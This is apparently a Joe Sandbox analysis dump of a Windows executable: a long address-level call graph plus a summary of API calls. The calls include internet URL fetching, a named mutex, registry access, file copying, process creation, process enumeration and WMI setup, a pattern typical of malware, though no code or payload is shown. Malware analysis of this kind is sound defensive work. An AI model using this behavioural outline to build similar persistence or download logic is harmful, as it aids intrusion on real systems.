38716->38717 38718 41ad43 38716->38718 38717->38716 39145 413ff0 59 API calls ___check_float_string 38718->39145 38720 41ad6b 38721 412900 60 API calls 38720->38721 38722 41ad76 _memmove 38721->38722 38723 415c10 59 API calls 38722->38723 38724 41ae2a 38723->38724 39146 413580 59 API calls 38724->39146 38726 41ae3c 38727 415c10 59 API calls 38726->38727 38728 41ae76 38727->38728 39147 413580 59 API calls 38728->39147 38730 41ae82 38731 415c10 59 API calls 38730->38731 38732 41aebc 38731->38732 39148 413580 59 API calls 38732->39148 38734 41aec8 38735 415c10 59 API calls 38734->38735 38736 41af02 38735->38736 39149 413580 59 API calls 38736->39149 38738 41af0e 38739 415c10 59 API calls 38738->38739 38740 41af48 38739->38740 39150 413580 59 API calls 38740->39150 38742 41af54 38743 415c10 59 API calls 38742->38743 38744 41af8e 38743->38744 39151 413580 59 API calls 38744->39151 38746 41af9a 38747 415c10 59 API calls 38746->38747 38748 41afd4 38747->38748 39152 413580 59 API calls 38748->39152 38750 41afe0 39153 413100 59 API calls 38750->39153 38752 41b001 39154 413580 59 API calls 38752->39154 38754 41b025 39155 413100 59 API calls 38754->39155 38756 41b03c 39156 413580 59 API calls 38756->39156 38758 41b059 39157 413100 59 API calls 38758->39157 38760 41b070 39158 413580 59 API calls 38760->39158 38762 41b07c 39159 413100 59 API calls 38762->39159 38764 41b093 39160 413580 59 API calls 38764->39160 38766 41b09f 39161 413100 59 API calls 38766->39161 38768 41b0b6 39162 413580 59 API calls 38768->39162 38770 41b0c2 39163 413100 59 API calls 38770->39163 38772 41b0d9 39164 413580 59 API calls 38772->39164 38774 41b0e5 39165 413100 59 API calls 38774->39165 38776 41b0fc 39166 413580 59 API calls 38776->39166 38778 41b108 38780 41b130 38778->38780 39167 41cdd0 59 API calls 38778->39167 38781 40ef50 58 API calls 38780->38781 38782 41b16e 38781->38782 38784 41b1a5 GetUserNameW 38782->38784 39168 412de0 59 API calls 38782->39168 38785 41b1c9 38784->38785 39169 412c40 38785->39169 38787 41b1d8 39176 412bf0 59 API calls 38787->39176 38789 41b1ea 39177 40ecb0 60 API calls 2 library calls 38789->39177 38791 41b2f5 39180 4136c0 59 API calls 38791->39180 38793 41b308 39181 40ca70 59 API calls 38793->39181 38795 41b311 39182 4130b0 59 API calls 38795->39182 38797 412c40 59 API calls 38812 41b1f3 38797->38812 38798 41b322 39183 40c740 102 API calls 4 library calls 38798->39183 38800 412900 60 API calls 38800->38812 38801 41b327 39184 4111c0 169 API calls 2 library calls 38801->39184 38804 41b33b 39185 41ba10 LoadCursorW RegisterClassExW 38804->39185 38806 413100 59 API calls 38806->38812 38807 41b343 39186 41ba80 CreateWindowExW ShowWindow UpdateWindow 38807->39186 38809 41b34b 38813 41b34f 38809->38813 39187 410a50 65 API calls 38809->39187 38812->38791 38812->38797 38812->38800 38812->38806 39178 413580 59 API calls 38812->39178 39179 40f1f0 59 API calls 38812->39179 38813->38685 38814 41b379 39188 413100 59 API calls 38814->39188 38816 41b3a5 39189 413580 59 API calls 38816->39189 38818 41b48b 39195 41fdc0 CreateThread 38818->39195 38820 41b49f GetMessageW 38821 41b4ed 38820->38821 38822 41b4bf 38820->38822 38825 41b502 PostThreadMessageW 38821->38825 38826 41b55b 38821->38826 38823 41b4c5 TranslateMessage DispatchMessageW GetMessageW 38822->38823 38823->38821 38823->38823 38827 41b510 PeekMessageW 38825->38827 38828 41b564 PostThreadMessageW 38826->38828 38829 41b5bb 38826->38829 38830 41b546 WaitForSingleObject 38827->38830 38831 41b526 DispatchMessageW PeekMessageW 38827->38831 38832 41b570 PeekMessageW 38828->38832 38829->38813 38833 41b5d2 CloseHandle 38829->38833 38830->38826 38830->38827 38831->38830 38831->38831 38834 41b5a6 WaitForSingleObject 38832->38834 38835 41b586 DispatchMessageW PeekMessageW 38832->38835 38833->38813 38834->38829 38834->38832 38835->38834 38835->38835 38840 41b3b3 38840->38818 39190 41c330 59 API calls 38840->39190 39191 41c240 59 API calls 38840->39191 39192 41b8b0 59 API calls 38840->39192 39193 413260 59 API calls 38840->39193 39194 41fa10 CreateThread 38840->39194 39515 427e0e 38841->39515 38843 427f4c 38843->38547 38846->38559 38847->38549 38848->38559 38851 428c9d 38849->38851 38852 428cd8 38851->38852 38854 428cbb 38851->38854 38859 43b813 38851->38859 38852->38575 38854->38851 38854->38852 38867 4329c9 Sleep 38854->38867 38855->38575 38856->38570 38857->38570 38858->38578 38860 43b81e 38859->38860 38864 43b839 38859->38864 38861 43b82a 38860->38861 38860->38864 38868 425208 58 API calls __getptd_noexit 38861->38868 38863 43b849 HeapAlloc 38863->38864 38865 43b82f 38863->38865 38864->38863 38864->38865 38869 42793d DecodePointer 38864->38869 38865->38851 38867->38854 38868->38865 38869->38864 38871 43aeb8 EncodePointer 38870->38871 38871->38871 38872 43aed2 38871->38872 38872->38582 38873->38584 38875 40cf32 _memset __write_nolock 38874->38875 38876 40cf4f InternetOpenW 38875->38876 38877 415c10 59 API calls 38876->38877 38878 40cf8a InternetOpenUrlW 38877->38878 38879 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 38878->38879 38887 40cfb2 38878->38887 39198 4156d0 38879->39198 38881 40d000 38882 4156d0 59 API calls 38881->38882 38883 40d049 38882->38883 38883->38887 39217 413010 59 API calls 38883->39217 38885 40d084 38885->38887 39218 413010 59 API calls 38885->39218 38887->38588 39223 41ccc0 38888->39223 39243 41cc50 38891->39243 38894 41a04d 38894->38600 38894->38605 38897 413ab2 38896->38897 38903 413ad0 GetModuleFileNameW PathRemoveFileSpecW 38896->38903 38898 413b00 38897->38898 38899 413aba 38897->38899 39251 44f23e 59 API calls 2 library calls 38898->39251 38900 423b4c 59 API calls 38899->38900 38902 413ac7 38900->38902 38902->38903 39252 44f1bb 59 API calls 3 library calls 38902->39252 38906 418400 38903->38906 38907 418437 38906->38907 38911 418446 38906->38911 38907->38911 39253 415d50 59 API calls ___check_float_string 38907->39253 38909 4184b9 38909->38613 38911->38909 39254 418d50 59 API calls 38911->39254 39255 431781 38912->39255 39273 42f7c0 38915->39273 38918 411d20 _memset 38919 411d40 RegQueryValueExW RegCloseKey 38918->38919 38920 411d8f 38919->38920 38921 415c10 59 API calls 38920->38921 38922 411dbf 38921->38922 38923 411dd1 lstrlenA 38922->38923 38924 411e7c 38922->38924 39275 413520 59 API calls 38923->39275 38926 411e94 6 API calls 38924->38926 38928 411ef5 UuidCreate UuidToStringW 38926->38928 38927 411df1 38929 411e3c PathFileExistsW 38927->38929 38930 411e08 38927->38930 38931 411f36 38928->38931 38929->38924 38932 411e52 38929->38932 38930->38927 38930->38929 38931->38931 38934 415c10 59 API calls 38931->38934 38933 411e6a 38932->38933 38936 414690 59 API calls 38932->38936 38937 4121d1 38933->38937 38935 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 38934->38935 38938 411fce 38935->38938 38940 411f98 38935->38940 38936->38933 38937->38642 38939 415c10 59 API calls 38938->38939 38942 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 38939->38942 38941 415c10 59 API calls 38940->38941 38941->38938 38942->38937 38943 41207c _memset 38942->38943 38944 412095 6 API calls 38943->38944 38945 412115 _memset 38944->38945 38946 412109 38944->38946 38948 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 38945->38948 39276 413260 59 API calls 38946->39276 38949 4121b2 38948->38949 38950 4121aa GetLastError 38948->38950 38951 4121c0 WaitForSingleObject 38949->38951 38950->38937 38951->38937 38951->38951 38953 42f7c0 __write_nolock 38952->38953 38954 41222d 7 API calls 38953->38954 38955 4122bd K32EnumProcesses 38954->38955 38956 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 38954->38956 38957 4122d3 38955->38957 38958 4122df 38955->38958 38956->38955 38957->38616 38959 412353 38958->38959 38960 4122f0 OpenProcess 38958->38960 38959->38616 38961 412346 CloseHandle 38960->38961 38962 41230a K32EnumProcessModules 38960->38962 38961->38959 38961->38960 38962->38961 38963 41231c K32GetModuleBaseNameW 38962->38963 39277 420235 38963->39277 38965 41233e 38965->38961 38966 412345 38965->38966 38966->38961 38968 420c62 _malloc 58 API calls 38967->38968 38971 40ef6e _memset 38968->38971 38969 40efdc 38969->38621 38970 420c62 _malloc 58 API calls 38970->38971 38971->38969 38971->38970 38971->38971 38973 413f05 38972->38973 38974 413eae 38972->38974 38975 413fb1 38973->38975 38976 413f18 38973->38976 38974->38973 38984 413ed4 38974->38984 39293 44f23e 59 API calls 2 library calls 38975->39293 38978 413fbb 38976->38978 38979 413f2d 38976->38979 38985 413f3d ___check_float_string 38976->38985 39294 44f23e 59 API calls 2 library calls 38978->39294 38979->38985 39292 416760 59 API calls 2 library calls 38979->39292 38987 413ed9 38984->38987 38988 413eef 38984->38988 38985->38621 39290 413da0 59 API calls ___check_float_string 38987->39290 39291 413da0 59 API calls ___check_float_string 38988->39291 38991 413eff 38991->38621 38992 413ee9 38992->38621 38994 4146a9 38993->38994 38995 41478c 38993->38995 38997 4146b6 38994->38997 38998 4146e9 38994->38998 39297 44f26c 59 API calls 3 library calls 38995->39297 38999 414796 38997->38999 39000 4146c2 38997->39000 39001 4147a0 38998->39001 39002 4146f5 38998->39002 39298 44f26c 59 API calls 3 library calls 38999->39298 39295 413340 59 API calls _memmove 39000->39295 39299 44f23e 59 API calls 2 library calls 39001->39299 39014 414707 ___check_float_string 39002->39014 39296 416950 59 API calls 2 library calls 39002->39296 39011 4146e0 39011->38640 39014->38640 39017 40d27d CoInitializeSecurity 39016->39017 39023 40d276 39016->39023 39018 414690 59 API calls 39017->39018 39019 40d2b8 CoCreateInstance 39018->39019 39020 40d2e3 VariantInit VariantInit VariantInit VariantInit 39019->39020 39021 40da3c CoUninitialize 39019->39021 39022 40d38e VariantClear VariantClear VariantClear VariantClear 39020->39022 39021->39023 39024 40d3e2 39022->39024 39025 40d3cc CoUninitialize 39022->39025 39023->38661 39300 40b140 39024->39300 39025->39023 39028 40d3f6 39305 40b1d0 39028->39305 39030 40d422 39031 40d426 CoUninitialize 39030->39031 39032 40d43c 39030->39032 39031->39023 39033 40b140 60 API calls 39032->39033 39035 40d449 39033->39035 39036 40b1d0 SysFreeString 39035->39036 39037 40d471 39036->39037 39038 40d496 CoUninitialize 39037->39038 39039 40d4ac 39037->39039 39038->39023 39041 40d8cf 39039->39041 39042 40b140 60 API calls 39039->39042 39041->39021 39043 40d4d5 39042->39043 39044 40b1d0 SysFreeString 39043->39044 39045 40d4fd 39044->39045 39045->39041 39046 40b140 60 API calls 39045->39046 39047 40d5ae 39046->39047 39048 40b1d0 SysFreeString 39047->39048 39049 40d5d6 39048->39049 39049->39041 39050 40b140 60 API calls 39049->39050 39051 40d679 39050->39051 39052 40b1d0 SysFreeString 39051->39052 39053 40d6a1 39052->39053 39053->39041 39054 40b140 60 API calls 39053->39054 39055 40d6b6 39054->39055 39056 40b1d0 SysFreeString 39055->39056 39057 40d6de 39056->39057 39057->39041 39058 40b140 60 API calls 39057->39058 39059 40d707 39058->39059 39060 40b1d0 SysFreeString 39059->39060 39061 40d72f 39060->39061 39061->39041 39062 40b140 60 API calls 39061->39062 39063 40d744 39062->39063 39064 40b1d0 SysFreeString 39063->39064 39065 40d76c 39064->39065 39065->39041 39309 423aaf GetSystemTimeAsFileTime 39065->39309 39067 40d77d 39311 423551 39067->39311 39072 412c40 59 API calls 39073 40d7b5 39072->39073 39074 412900 60 API calls 39073->39074 39075 40d7c3 39074->39075 39076 40b140 60 API calls 39075->39076 39077 40d7db 39076->39077 39078 40b1d0 SysFreeString 39077->39078 39079 40d7ff 39078->39079 39079->39041 39080 40b140 60 API calls 39079->39080 39081 40d8a3 39080->39081 39082 40b1d0 SysFreeString 39081->39082 39083 40d8cb 39082->39083 39083->39041 39084 40b140 60 API calls 39083->39084 39085 40d8ea 39084->39085 39086 40b1d0 SysFreeString 39085->39086 39087 40d912 39086->39087 39087->39041 39319 40b400 SysAllocString 39087->39319 39089 40d936 VariantInit VariantInit 39090 40b140 60 API calls 39089->39090 39091 40d985 39090->39091 39092 40b1d0 SysFreeString 39091->39092 39093 40d9e7 VariantClear VariantClear VariantClear 39092->39093 39094 40da10 39093->39094 39096 40da46 CoUninitialize 39093->39096 39323 42052a 78 API calls vswprintf 39094->39323 39096->39023 39098->38595 39099->38638 39100->38639 39101->38677 39103 420cdd 39102->39103 39113 420c6e 39102->39113 39503 42793d DecodePointer 39103->39503 39105 420ce3 39504 425208 58 API calls __getptd_noexit 39105->39504 39108 420ca1 RtlAllocateHeap 39109 420cd5 39108->39109 39108->39113 39109->38666 39111 420c79 39111->39113 39495 427f51 58 API calls 2 library calls 39111->39495 39496 427fae 58 API calls 7 library calls 39111->39496 39497 427b0b 39111->39497 39112 420cc9 39501 425208 58 API calls __getptd_noexit 39112->39501 39113->39108 39113->39111 39113->39112 39117 420cc7 39113->39117 39500 42793d DecodePointer 39113->39500 39502 425208 58 API calls __getptd_noexit 39117->39502 39119->38678 39121 415c66 39120->39121 39125 415c1e 39120->39125 39122 415c76 39121->39122 39123 415cff 39121->39123 39129 415c88 ___check_float_string 39122->39129 39509 416950 59 API calls 2 library calls 39122->39509 39510 44f23e 59 API calls 2 library calls 39123->39510 39125->39121 39131 415c45 39125->39131 39129->38683 39133 414690 59 API calls 39131->39133 39134 415c60 39133->39134 39134->38683 39135->38686 39136->38688 39137->38694 39138->38704 39140 413a90 59 API calls 39139->39140 39141 41294c MultiByteToWideChar 39140->39141 39142 418400 59 API calls 39141->39142 39143 41298d 39142->39143 39143->38706 39144->38712 39145->38720 39146->38726 39147->38730 39148->38734 39149->38738 39150->38742 39151->38746 39152->38750 39153->38752 39154->38754 39155->38756 39156->38758 39157->38760 39158->38762 39159->38764 39160->38766 39161->38768 39162->38770 39163->38772 39164->38774 39165->38776 39166->38778 39167->38780 39168->38782 39170 412c71 39169->39170 39171 412c5f 39169->39171 39174 4156d0 59 API calls 39170->39174 39172 4156d0 59 API calls 39171->39172 39173 412c6a 39172->39173 39173->38787 39175 412c8a 39174->39175 39175->38787 39176->38789 39177->38812 39178->38812 39179->38812 39180->38793 39181->38795 39182->38798 39183->38801 39184->38804 39185->38807 39186->38809 39187->38814 39188->38816 39189->38840 39190->38840 39191->38840 39192->38840 39193->38840 39194->38840 39511 41f130 218 API calls _TranslateName 39194->39511 39195->38820 39512 41fd80 64 API calls 39195->39512 39199 415735 39198->39199 39204 4156de 39198->39204 39200 4157bc 39199->39200 39201 41573e 39199->39201 39222 44f23e 59 API calls 2 library calls 39200->39222 39210 415750 ___check_float_string 39201->39210 39221 416760 59 API calls 2 library calls 39201->39221 39204->39199 39208 415704 39204->39208 39211 415709 39208->39211 39212 41571f 39208->39212 39210->38881 39219 413ff0 59 API calls ___check_float_string 39211->39219 39220 413ff0 59 API calls ___check_float_string 39212->39220 39215 41572f 39215->38881 39216 415719 39216->38881 39217->38885 39218->38887 39219->39216 39220->39215 39221->39210 39229 423b4c 39223->39229 39225 41ccca 39227 41a00a 39225->39227 39239 44f1bb 59 API calls 3 library calls 39225->39239 39227->38597 39227->38598 39231 423b54 39229->39231 39230 420c62 _malloc 58 API calls 39230->39231 39231->39230 39232 423b6e 39231->39232 39234 423b72 std::exception::exception 39231->39234 39240 42793d DecodePointer 39231->39240 39232->39225 39241 430eca RaiseException 39234->39241 39236 423b9c 39242 430d91 58 API calls _free 39236->39242 39238 423bae 39238->39225 39240->39231 39241->39236 39242->39238 39244 423b4c 59 API calls 39243->39244 39245 41cc5d 39244->39245 39247 41cc64 39245->39247 39250 44f1bb 59 API calls 3 library calls 39245->39250 39247->38894 39249 41d740 59 API calls 39247->39249 39249->38894 39253->38911 39254->38911 39258 431570 39255->39258 39259 431580 39258->39259 39260 431586 39259->39260 39265 4315ae 39259->39265 39269 425208 58 API calls __getptd_noexit 39260->39269 39262 43158b 39270 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 39262->39270 39267 4315cf wcstoxq 39265->39267 39271 42e883 GetStringTypeW 39265->39271 39266 41a36e lstrcpyW lstrcpyW 39266->38631 39267->39266 39272 425208 58 API calls __getptd_noexit 39267->39272 39269->39262 39270->39266 39271->39265 39272->39266 39274 411cf2 RegOpenKeyExW 39273->39274 39274->38918 39274->38937 39275->38927 39276->38945 39278 4202b6 39277->39278 39279 420241 39277->39279 39289 4202c8 60 API calls 3 library calls 39278->39289 39286 420266 39279->39286 39287 425208 58 API calls __getptd_noexit 39279->39287 39282 4202c3 39282->38965 39283 42024d 39288 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 39283->39288 39285 420258 39285->38965 39286->38965 39287->39283 39288->39285 39289->39282 39290->38992 39291->38991 39292->38985 39295->39011 39296->39014 39297->38999 39298->39001 39301 423b4c 59 API calls 39300->39301 39302 40b164 39301->39302 39303 40b177 SysAllocString 39302->39303 39304 40b194 39302->39304 39303->39304 39304->39028 39306 40b1de 39305->39306 39307 40b202 39305->39307 39306->39307 39308 40b1f5 SysFreeString 39306->39308 39307->39030 39308->39307 39310 423add __aulldiv 39309->39310 39310->39067 39324 43035d 39311->39324 39313 40d78f 39316 4228e0 39313->39316 39314 42355a 39314->39313 39332 423576 39314->39332 39450 42279f 39316->39450 39320 40b423 39319->39320 39321 40b41d 39319->39321 39322 40b42d VariantClear 39320->39322 39321->39089 39322->39089 39323->39041 39365 42501f 58 API calls 4 library calls 39324->39365 39326 430363 39327 43038d 39326->39327 39331 430369 39326->39331 39367 428cde 39326->39367 39327->39314 39330 43036e 39330->39314 39331->39327 39366 425208 58 API calls __getptd_noexit 39331->39366 39333 423591 39332->39333 39334 4235a9 _memset 39332->39334 39382 425208 58 API calls __getptd_noexit 39333->39382 39334->39333 39340 4235c0 39334->39340 39336 423596 39383 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 39336->39383 39338 4235e9 39374 42fb64 39338->39374 39339 4235cb 39384 425208 58 API calls __getptd_noexit 39339->39384 39340->39338 39340->39339 39343 4235ee 39385 42f803 58 API calls __output_l 39343->39385 39345 4235f7 39346 4237e5 39345->39346 39386 42f82d 58 API calls __output_l 39345->39386 39399 4242fd 8 API calls 2 library calls 39346->39399 39349 4237ef 39350 423609 39350->39346 39387 42f857 39350->39387 39352 42361b 39352->39346 39353 423624 39352->39353 39354 42369b 39353->39354 39355 423637 39353->39355 39397 42f939 58 API calls 4 library calls 39354->39397 39394 42f939 58 API calls 4 library calls 39355->39394 39358 4236a2 39364 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 39358->39364 39398 42fbb4 58 API calls 4 library calls 39358->39398 39359 42364f 39359->39364 39395 42fbb4 58 API calls 4 library calls 39359->39395 39362 423668 39362->39364 39396 42f939 58 API calls 4 library calls 39362->39396 39364->39313 39365->39326 39366->39330 39369 428cec 39367->39369 39368 420c62 _malloc 58 API calls 39368->39369 39369->39368 39370 428d1e 39369->39370 39371 428cff 39369->39371 39370->39331 39371->39369 39371->39370 39373 4329c9 Sleep 39371->39373 39373->39371 39375 42fb70 __write 39374->39375 39376 42fba5 __write 39375->39376 39400 428af7 39375->39400 39376->39343 39378 42fb80 39381 42fb93 39378->39381 39407 42fe47 39378->39407 39436 42fbab LeaveCriticalSection _doexit 39381->39436 39382->39336 39383->39364 39384->39364 39385->39345 39386->39350 39388 42f861 39387->39388 39389 42f876 39387->39389 39448 425208 58 API calls __getptd_noexit 39388->39448 39389->39352 39391 42f866 39449 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 39391->39449 39393 42f871 39393->39352 39394->39359 39395->39362 39396->39364 39397->39358 39398->39364 39399->39349 39401 428b1b EnterCriticalSection 39400->39401 39402 428b08 39400->39402 39401->39378 39437 428b9f 58 API calls 10 library calls 39402->39437 39404 428b0e 39404->39401 39438 427c2e 58 API calls 3 library calls 39404->39438 39408 42fe53 __write 39407->39408 39409 428af7 __lock 58 API calls 39408->39409 39410 42fe71 __tzset_nolock 39409->39410 39411 42f857 __tzset_nolock 58 API calls 39410->39411 39412 42fe86 39411->39412 39426 42ff25 __tzset_nolock 39412->39426 39439 42f803 58 API calls __output_l 39412->39439 39415 42fe98 39415->39426 39440 42f82d 58 API calls __output_l 39415->39440 39416 42ff71 GetTimeZoneInformation 39416->39426 39419 42feaa 39419->39426 39441 433f99 58 API calls 2 library calls 39419->39441 39421 42ffd8 WideCharToMultiByte 39421->39426 39422 42feb8 39442 441667 78 API calls 3 library calls 39422->39442 39424 430010 WideCharToMultiByte 39424->39426 39426->39416 39426->39421 39426->39424 39428 430157 __write __tzset_nolock 39426->39428 39429 43ff8e 58 API calls __tzset_nolock 39426->39429 39433 423c2d 61 API calls UnDecorator::getTemplateConstant 39426->39433 39445 4242fd 8 API calls 2 library calls 39426->39445 39446 420bed 58 API calls 2 library calls 39426->39446 39447 4300d7 LeaveCriticalSection _doexit 39426->39447 39427 42ff0c _strlen 39430 428cde __malloc_crt 58 API calls 39427->39430 39428->39381 39429->39426 39434 42ff1a _strlen 39430->39434 39431 42fed9 ___TypeMatch 39431->39426 39431->39427 39443 420bed 58 API calls 2 library calls 39431->39443 39433->39426 39434->39426 39444 42c0fd 58 API calls __output_l 39434->39444 39436->39376 39437->39404 39439->39415 39440->39419 39441->39422 39442->39431 39443->39427 39444->39426 39445->39426 39446->39426 39447->39426 39448->39391 39449->39393 39477 42019c 39450->39477 39453 4227d4 39485 425208 58 API calls __getptd_noexit 39453->39485 39455 4227d9 39486 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 39455->39486 39456 4227e9 MultiByteToWideChar 39458 422804 GetLastError 39456->39458 39459 422815 39456->39459 39487 4251e7 58 API calls 3 library calls 39458->39487 39461 428cde __malloc_crt 58 API calls 39459->39461 39462 42281d 39461->39462 39463 422825 MultiByteToWideChar 39462->39463 39476 422810 39462->39476 39463->39458 39465 42283f 39463->39465 39467 428cde __malloc_crt 58 API calls 39465->39467 39466 4228a0 39491 420bed 58 API calls 2 library calls 39466->39491 39469 42284a 39467->39469 39469->39476 39488 42d51e 88 API calls 3 library calls 39469->39488 39470 40d7a3 39470->39072 39472 422866 39473 42286f WideCharToMultiByte 39472->39473 39472->39476 39474 42288b GetLastError 39473->39474 39473->39476 39489 4251e7 58 API calls 3 library calls 39474->39489 39490 420bed 58 API calls 2 library calls 39476->39490 39478 4201ad 39477->39478 39484 4201fa 39477->39484 39492 425007 58 API calls 2 library calls 39478->39492 39480 4201b3 39481 4201da 39480->39481 39493 4245dc 58 API calls 6 library calls 39480->39493 39481->39484 39494 42495e 58 API calls 6 library calls 39481->39494 39484->39453 39484->39456 39485->39455 39486->39470 39487->39476 39488->39472 39489->39476 39490->39466 39491->39470 39492->39480 39493->39481 39494->39484 39495->39111 39496->39111 39505 427ad7 GetModuleHandleExW 39497->39505 39500->39113 39501->39117 39502->39109 39503->39105 39504->39109 39506 427af0 GetProcAddress 39505->39506 39507 427b07 ExitProcess 39505->39507 39506->39507 39508 427b02 39506->39508 39508->39507 39509->39129 39516 427e1a __write 39515->39516 39517 428af7 __lock 51 API calls 39516->39517 39518 427e21 39517->39518 39519 427eda __cinit 39518->39519 39520 427e4f DecodePointer 39518->39520 39535 427f28 39519->39535 39520->39519 39522 427e66 DecodePointer 39520->39522 39529 427e76 39522->39529 39524 427f37 __write 39524->38843 39526 427e83 EncodePointer 39526->39529 39527 427f1f 39528 427b0b __lockerr_exit 3 API calls 39527->39528 39530 427f28 39528->39530 39529->39519 39529->39526 39531 427e93 DecodePointer EncodePointer 39529->39531 39532 427f35 39530->39532 39540 428c81 LeaveCriticalSection 39530->39540 39533 427ea5 DecodePointer DecodePointer 39531->39533 39532->38843 39533->39529 39536 427f2e 39535->39536 39538 427f08 39535->39538 39541 428c81 LeaveCriticalSection 39536->39541 39538->39524 39539 428c81 LeaveCriticalSection 39538->39539 39539->39527 39540->39532 39541->39538 39542 423f84 39543 423f90 __write 39542->39543 39579 432603 GetStartupInfoW 39543->39579 39546 423f95 39581 4278d5 GetProcessHeap 39546->39581 39547 423fed 39548 423ff8 39547->39548 39632 42411a 58 API calls 3 library calls 39547->39632 39582 425141 39548->39582 39551 423ffe 39552 424009 __RTC_Initialize 39551->39552 39633 42411a 58 API calls 3 library calls 39551->39633 39603 428754 39552->39603 39555 424024 GetCommandLineW 39622 43235f GetEnvironmentStringsW 39555->39622 39556 424018 39556->39555 39634 42411a 58 API calls 3 library calls 39556->39634 39559 424023 39559->39555 39562 42403e 39563 424049 39562->39563 39635 427c2e 58 API calls 3 library calls 39562->39635 39565 4321a1 __wsetenvp 58 API calls 39563->39565 39566 42404f 39565->39566 39567 42405a 39566->39567 39636 427c2e 58 API calls 3 library calls 39566->39636 39569 427c68 __cinit 68 API calls 39567->39569 39570 424062 39569->39570 39571 42406d __wwincmdln 39570->39571 39637 427c2e 58 API calls 3 library calls 39570->39637 39573 419f90 586 API calls 39571->39573 39574 424081 39573->39574 39575 424090 39574->39575 39576 427f3d 58 API calls 39574->39576 39638 427c59 58 API calls _doexit 39575->39638 39576->39575 39578 424095 __write 39580 432619 39579->39580 39580->39546 39581->39547 39639 427d6c 36 API calls 2 library calls 39582->39639 39584 425146 39640 428c48 InitializeCriticalSectionAndSpinCount __getstream 39584->39640 39586 42514b 39587 42514f 39586->39587 39642 4324f7 TlsAlloc 39586->39642 39641 4251b7 61 API calls 2 library calls 39587->39641 39590 425154 39590->39551 39591 425161 39591->39587 39592 42516c 39591->39592 39593 428c96 __calloc_crt 58 API calls 39592->39593 39594 425179 39593->39594 39595 4251ae 39594->39595 39643 432553 TlsSetValue 39594->39643 39645 4251b7 61 API calls 2 library calls 39595->39645 39598 42518d 39598->39595 39600 425193 39598->39600 39599 4251b3 39599->39551 39644 42508e 58 API calls 4 library calls 39600->39644 39602 42519b GetCurrentThreadId 39602->39551 39604 428760 __write 39603->39604 39605 428af7 __lock 58 API calls 39604->39605 39606 428767 39605->39606 39607 428c96 __calloc_crt 58 API calls 39606->39607 39608 428778 39607->39608 39609 4287e3 GetStartupInfoW 39608->39609 39610 428783 __write @_EH4_CallFilterFunc@8 39608->39610 39611 428927 39609->39611 39613 4287f8 39609->39613 39610->39556 39612 4289ef 39611->39612 39616 428974 GetStdHandle 39611->39616 39618 428987 GetFileType 39611->39618 39647 43263e InitializeCriticalSectionAndSpinCount 39611->39647 39648 4289ff LeaveCriticalSection _doexit 39612->39648 39613->39611 39615 428c96 __calloc_crt 58 API calls 39613->39615 39617 428846 39613->39617 39615->39613 39616->39611 39617->39611 39619 42887a GetFileType 39617->39619 39646 43263e InitializeCriticalSectionAndSpinCount 39617->39646 39618->39611 39619->39617 39623 432370 39622->39623 39624 424034 39622->39624 39625 428cde __malloc_crt 58 API calls 39623->39625 39628 431f64 GetModuleFileNameW 39624->39628 39627 432396 ___check_float_string 39625->39627 39626 4323ac FreeEnvironmentStringsW 39626->39624 39627->39626 39629 431f98 _wparse_cmdline 39628->39629 39630 428cde __malloc_crt 58 API calls 39629->39630 39631 431fd8 _wparse_cmdline 39629->39631 39630->39631 39631->39562 39632->39548 39633->39552 39634->39559 39638->39578 39639->39584 39640->39586 39641->39590 39642->39591 39643->39598 39644->39602 39645->39599 39646->39617 39647->39611 39648->39610
                                                                                                APIs
                                                                                                  • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                  • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                  • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0055E270,?), ref: 0041A0BB
                                                                                                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                  • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                  • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                  • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
